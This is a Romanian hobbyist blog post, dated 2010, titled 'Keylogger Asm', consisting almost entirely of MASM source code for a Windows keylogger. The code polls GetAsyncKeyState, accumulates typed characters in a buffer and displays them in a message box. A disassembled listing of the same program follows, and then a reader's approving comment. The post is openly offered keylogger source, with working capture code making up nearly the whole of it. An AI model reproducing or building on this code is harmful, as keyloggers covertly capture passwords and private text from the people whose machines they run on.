« 

azrael-sub7.ro

 »
» Culoarea Temei : Negru Alb
» Limba : ∙ RODEEN
» Marime Text :   -   +
» Cauta :
† Index † Contact

Keylogger Asm

Data : 16.02.10

Taguri : , , , , ,

Am rescris metoda cu GetAsyncKeyState in masm , ma rog e mai necizelata dar merge : Cod :
  1.  
  2.  
  3. .Const
  4.  
  5. .Data?
  6.  
  7. sh DD ?
  8. cp DD ?
  9. Number DD ?
  10.  
  11. index DD ?
  12. tindex DD ?
  13. TempC DB ?
  14.  
  15. .Data
  16.  
  17. WprType DB "%lc", 0
  18. Keys DB 512 Dup(0)
  19.  
  20. .Code
  21. start:
  22. Mov Keys, 0
  23. rr:
  24. Invoke Sleep, 60
  25. Mov index, 0
  26. Mov index, 8
  27. ForLoop:
  28. ;test
  29. Invoke GetAsyncKeyState, 14H
  30. .If Eax
  31. Invoke MessageBox, 0, Addr Keys, 0, 0
  32. Invoke ExitProcess, NULL
  33. .EndIf
  34. ;test
  35. Invoke GetAsyncKeyState, index
  36. .If Eax == -32767 ;
  37. Invoke GetAsyncKeyState, 20H
  38. .If Eax
  39. Invoke wsprintf, Addr TempC, Addr WprType, 20H ; Space ajunge …
  40. Invoke lstrcat, Addr Keys, Addr TempC
  41. .ElseIf (index >= 60) &amp;&amp; (index < = 90)
  42. Mov sh, 0
  43. Mov cp, 0
  44. Invoke GetAsyncKeyState, 14H ;
  45. Mov sh, Eax
  46. Invoke GetAsyncKeyState, 10H ;
  47. Mov cp, Eax
  48. .If cp != 0 || sh != 0 ;
  49. Xor Eax, Eax
  50. Mov tindex, Eax
  51. Mov Eax, index
  52. Mov tindex, Eax
  53. Invoke wsprintf, Addr TempC, Addr WprType, tindex
  54. Invoke lstrcat, Addr Keys, Addr TempC
  55. .Else
  56. Xor Eax, Eax
  57. Mov tindex, Eax
  58. Mov Eax, index
  59. Mov tindex, Eax
  60. Add tindex, 32
  61. Invoke wsprintf, Addr TempC, Addr WprType, tindex
  62. Invoke lstrcat, Addr Keys, Addr TempC
  63. .EndIf
  64.  
  65. .If index == 190
  66. Jmp rr
  67. .Else
  68. Inc index
  69. Jmp ForLoop
  70. .EndIf
  71.  
  72. .EndIf
  73. .EndIf
  74.  
  75. .If index == 190
  76. Jmp rr
  77. .Else
  78. Inc index
  79. Jmp ForLoop
  80. .EndIf
  81.  
  82. Invoke ExitProcess, NULL
  83. End start
  84.  
In “raw asm” ar arata cam asa :
  1. ;< = Procedure Start
  2.  
  3.         mov byte ptr [keys],0
  4.  
  5. @Project1_00401007:
  6.  
  7.         push 03ch
  8.         call _sleep@4                        ; JMP to kernel32.Sleep
  9.         mov dword ptr [index],0
  10.         mov dword ptr [index],8
  11.  
  12. @Project1_00401022:
  13.  
  14.         push 014h
  15.         call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
  16.         or eax,eax
  17.         je @Project1_00401044
  18.         push 0
  19.         push 0
  20.         push offset keys
  21.         push 0
  22.         call _messageboxa@16                 ; JMP to user32.MessageBoxA
  23.         push 0
  24.         call _exitprocess@4                  ; JMP to kernel32.ExitProcess
  25.  
  26. @Project1_00401044:
  27.  
  28.         push dword ptr [index]
  29.         call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
  30.         cmp eax,0ffff8001h
  31.         jnz @Project1_0040117c
  32.         push 020h
  33.         call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
  34.         or eax,eax
  35.         je @Project1_0040108d
  36.         push 020h
  37.         push offset wprtype                  ; ASCII "%lc"
  38.         push offset tempc
  39.         call _wsprintfa                      ; JMP to user32.wsprintfA
  40.         add esp,0ch
  41.         push offset tempc
  42.         push offset keys
  43.         call _lstrcata@8                     ; JMP to kernel32.lstrcatA
  44.         jmp @Project1_0040117c
  45.  
  46. @Project1_0040108d:
  47.  
  48.         cmp dword ptr [index],03ch
  49.         jb @Project1_0040117c
  50.         cmp dword ptr [index],05ah
  51.         ja @Project1_0040117c
  52.         mov dword ptr [sh],0
  53.         mov dword ptr [cp],0
  54.         push 014h
  55.         call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
  56.         mov [sh],eax
  57.         push 010h
  58.         call _getasynckeystate@4             ; JMP to user32.GetAsyncKeyState
  59.         mov [cp],eax
  60.         cmp dword ptr [cp],0
  61.         jnz @Project1_004010e5
  62.         cmp dword ptr [sh],0
  63.         je @Project1_0040111f
  64.  
  65. @Project1_004010e5:
  66.  
  67.         xor eax,eax
  68.         mov [tindex],eax
  69.         mov eax,[index]
  70.         mov [tindex],eax
  71.         push dword ptr [tindex]
  72.         push offset wprtype                  ; ASCII "%lc"
  73.         push offset tempc
  74.         call _wsprintfa                      ; JMP to user32.wsprintfA
  75.         add esp,0ch
  76.         push offset tempc
  77.         push offset keys
  78.         call _lstrcata@8                     ; JMP to kernel32.lstrcatA
  79.         jmp @Project1_0040115e
  80.  
  81. @Project1_0040111f:
  82.  
  83.         xor eax,eax
  84.         mov [tindex],eax
  85.         mov eax,[index]
  86.         mov [tindex],eax
  87.         add dword ptr [tindex],020h
  88.         push dword ptr [tindex]
  89.         push offset wprtype                  ; ASCII "%lc"
  90.         push offset tempc
  91.         call _wsprintfa                      ; JMP to user32.wsprintfA
  92.         add esp,0ch
  93.         push offset tempc
  94.         push offset keys
  95.         call _lstrcata@8                     ; JMP to kernel32.lstrcatA
  96.  
  97. @Project1_0040115e:
  98.  
  99.         cmp dword ptr [index],0beh
  100.         jnz @Project1_00401171
  101.         jmp @Project1_00401007
  102.         jmp @Project1_0040117c
  103.  
  104. @Project1_00401171:
  105.  
  106.         inc dword ptr [index]
  107.         jmp @Project1_00401022
  108.  
  109. @Project1_0040117c:
  110.  
  111.         cmp dword ptr [index],0beh
  112.         jnz @Project1_0040118f
  113.         jmp @Project1_00401007               ;<= Procedure End
  114.  
  115.         jmp @Project1_0040119a
  116.  
  117. @Project1_0040118f:                          ;<= Procedure Start
  118.  
  119.         inc dword ptr [index]
  120.         jmp @Project1_00401022               ;<= Procedure End
  121.  
  122. @Project1_0040119a:                          ;<= Procedure Start
  123.  
  124.         push 0
  125.         call _exitprocess@4                  ;<= Procedure End ; JMP to kernel32.ExitProcess
  126.  
  127.         int3
  128.         jmp [<&amp;kernel32.exitprocess>]        ; kernel32.ExitProcess
  129.  
  130. _Sleep@4:
  131.  
  132.         jmp [< &amp;kernel32.sleep>]              ; kernel32.Sleep
  133.  
  134. _lstrcatA@8:
  135.  
  136.         jmp [< &amp;kernel32.lstrcata>]           ; kernel32.lstrcatA
  137.  
  138. _wsprintfA:
  139.  
  140.         jmp [< &amp;user32.wsprintfa>]            ; user32.wsprintfA
  141.  
  142. _GetAsyncKeyState@4:
  143.  
  144.         jmp [< &amp;user32.getasynckeystate>]     ; user32.GetAsyncKeyState
  145.  
  146. _MessageBoxA@16:
  147.  
  148.         jmp [< &amp;user32.messageboxa>]          ; user32.MessageBoxA
  149.  
Spatiu alocat pentru memorie e 3821 k maxim .

Comentarii : Reguli si Informatii :

  • Comentarile ce constituie o jignire indirecta sau directa adresata oricarei persoane vor fi inlaturate !
  • Folosirea unui limbaj trivial , licentios nejustificat poate duce la inlaturarea sau cenzurarea comentariului .
  • Daca doresti o imagine asociata comentariului trebuie sa foloesesti Gravatar.com
  • Toate comentarile sunt aprobate in mod automat .
  • Comentarile nu trebuie sa contina in mod excesiv linkuri ce au ca scop promovarea unor siteuri sau produse !
  • Comentarile care contin peste 4 linkuri vor fi automat oprite pentru evaluare ! .
  • Comentarile prin care se fac cereri absurde vor fi ignorate !

Un Comentariu la “Keylogger Asm”

  1. Gravatar-Pic

    La data de : February 26th, 2010 la ora 9:15 pm

    ceostoy, A scris :

    frumos bravo :)

Lasa un comentariu .


Site-ul foloseste platforma Wordpress | Template Made By Azrael-sub7 using fingers + keyboard + black screen |
Sitemap.xml - Sitemap.xml.gz | Debug : 16 queries. 0.715 seconds.
Pentru o navigare cat mai apreciabila descarca si foloseste browserul Firefox | Site Optimizat pentru browserul Firefox | Rezolutie optima 1152 X 864 sau peste aceasta valoare.
Bloguri | www.blog360.ro | www.bloglist.ro | Dark Sites
toateBlogurile.ro